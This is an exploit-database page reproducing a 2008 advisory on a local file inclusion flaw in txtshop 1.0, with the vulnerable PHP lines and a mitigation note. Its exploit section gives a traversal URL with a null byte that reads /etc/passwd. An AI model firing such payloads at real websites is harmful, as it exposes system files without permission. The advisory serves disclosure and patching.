header-logo
Suggest Exploit
vendor:
txtshop
by:
Pepelux
8.8
CVSS
HIGH
Local File Inclusion Vulnerability
98
CWE
Product Name: txtshop
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: txtshop
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

txtshop – beta 1.0 / Local File Inclusion Vulnerability

A Local File Inclusion vulnerability exists in txtshop version 1.0. The vulnerability is due to the 'language' parameter in the 'header.php' script not being properly sanitized before being used in an 'include_once' function call. This can be exploited to include arbitrary files from local resources via directory traversal attacks. Successful exploitation requires that 'register_globals' is set to 'on'.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized before being used in 'include_once' function calls.
Source

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
txtshop - beta 1.0 / Local File Inclusion Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$ Program: txtshop
$ Version: <= 1.0
$ File affected: ADMIN/header.php
$ Download: http://sourceforge.net/projects/txtshop/


Found by Pepelux <pepelux[at]enye-sec.org>
eNYe-Sec - www.enye-sec.org


--Bug --

4.	if (!$language)$language="ch";
5.	include_once("../lib/lang.".$language.".php");



-- Exploit --

http://site.com/ADMIN/header.php?language=/../../../../../etc/passwd%00

# milw0rm.com [2008-10-23]

Navigation

Suggest Exploit

Services By CQR